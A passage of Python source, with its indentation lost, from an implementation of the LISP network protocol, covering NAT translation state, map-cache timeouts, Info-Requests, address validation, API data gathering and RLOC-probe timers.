# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
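    #
    # NOTE: the unconditional return above disables this test function; the
    # code below is retained but currently unreachable.
    #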
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is, check to see if the private address changed, since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If the entry has not timed out, go through the RLOC-set to see if the
# encapsulation port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
    # Now remove from the map-cache all the timed-out entries on the
    # delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
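#
# Sketch of the walk parameters used above (illustrative): 'parms' is a
# two-element array [delete_list, checkpoint_list]. Timed-out entries are
# appended to delete_list during the walk and deleted afterwards, so the
# cache is not mutated while it is being traversed; surviving entries are
# gathered into checkpoint_list and written to the checkpoint file.
#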
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary keyed by hostname, where each
# value is an array of lisp_nat_info() entries. We keep all the current and
# previous NAT state associated with the Info-Request hostname. This is so we
# can track how much movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # So the new state does not match the youngest entry. See if it exists as
    # an older entry. If not, we prepend the new state; otherwise, we prepend
    # the new state and remove the old entry from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
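#
# Illustrative example: if host "xtr-1" re-registers from a new translated
# address/port, the new lisp_nat_info() is prepended, so
# lisp_nat_state_info["xtr-1"][0] is always the current NAT binding and
# older bindings follow it in the array.
#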
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the NAT
# interface we are sending the 4341 Info-Request on, and install an ephemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
        #endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
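#
# Examples of values accepted above (illustrative): "10.1.1.1" (IPv4),
# "aabb-ccdd-eeff" (MAC), "fd00::1" (IPv6), "+14085551212" (E.164),
# "'my-rloc-name'" (distinguished-name), and geo-prefixes containing
# N/S/W/E components.
#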
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
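#
# Illustrative API request strings (parameter names taken from the entry
# functions below): "map-cache%" walks and returns the entire map-cache,
# while 'map-cache%{"instance-id": "0", "eid-prefix": "10.0.0.0/8"}' returns
# the single matching entry.
#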
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Gather one map-cache entry into the data array for the API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-server or map-resolver configuration to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Gather one site-cache entry into the data array for the API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
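#
# The timer is self-rearming: lisp_process_rloc_probe_timer() below calls
# this function again as its first action, i.e.:
#
#   lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)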
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
gleaned_eid, do_probe = lisp_allow_gleaning(eid, None, parent_rloc)
if (gleaned_eid and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC-probe if we just received a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
